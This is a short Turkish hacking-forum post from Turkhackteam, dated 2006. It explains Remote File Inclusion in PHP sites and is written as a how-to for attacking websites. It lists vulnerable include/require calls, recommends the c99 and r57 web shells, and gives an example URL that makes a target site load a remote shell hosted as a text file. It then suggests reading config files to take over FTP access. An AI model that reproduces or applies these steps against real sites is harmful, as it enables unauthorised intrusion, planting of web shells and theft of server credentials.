RFI Nedir ? Nasıl Bulunur Ve Kullanılır ? (Kısa, Yüzeysel Anlatım)

yenicerix

Özel Üye
8 Eyl 2006
413
28
Sitede birçok döküman var. Çok sade yazılanlar da var ama yine de kısaca açıklamak istedim...
(Turkhackteam.Net)
Bir PHP sitesinde(Turkhackteam.Net)
include($bilmemne)
require($bilmemne)
include_once($bilmemne)
require_once($bilmemne)
gibi parametreler sisteme uzaktan kod çağırılmasını sağlar...
c99 veya r57 denen sheller var internetten bulabilirsiniz.(Turkhackteam.Net)
r57 biraz daha gelişmiş özelliklere sahiptir anlaşılması c99'a göre daha zordur..
Bu sheller bir siteye txt belgesi şeklinde atılır.
Ör: https://tik.lat/1x0tG şeklinde...
(Turkhackteam.Net)
Daha sonra bu hatalı parametrenin olduğu dosya diyelim ki asd.php , site adı qwe.com olsun olsun.(Turkhackteam.Net)
Şu şekilde kodumuz tamamlanır ve siteye RFI atağında bulunmuş oluruz:
(Turkhackteam.Net)
https://tik.lat/X5XVn bilmemne=http://www.site.com/r57.txt?
(Turkhackteam.Net)
Daha sonra zaten shell çalışınca yazma hakkı varsa ne âlâ.. Yoksa da config okuyarak FTP almaya çalışabilirsiniz...(Turkhackteam.Net)

Kısaca anlatmaya çalıştım ancak yine de sitedeki dökümanlara göz atın derim...

Bu döküman YeniceriX tarafından Turkhackteam.Net ailesi için yazılmıştır...

Anlaşılmayan noktaları sorun arkadaşlar...
//YeniceriX (Turkhackteam.Net)
//YeniceriX
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.